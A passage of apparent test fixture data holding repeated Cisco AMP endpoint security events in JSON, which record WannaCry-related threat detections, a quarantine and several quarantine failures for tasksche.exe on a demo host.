Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":884000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":541000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
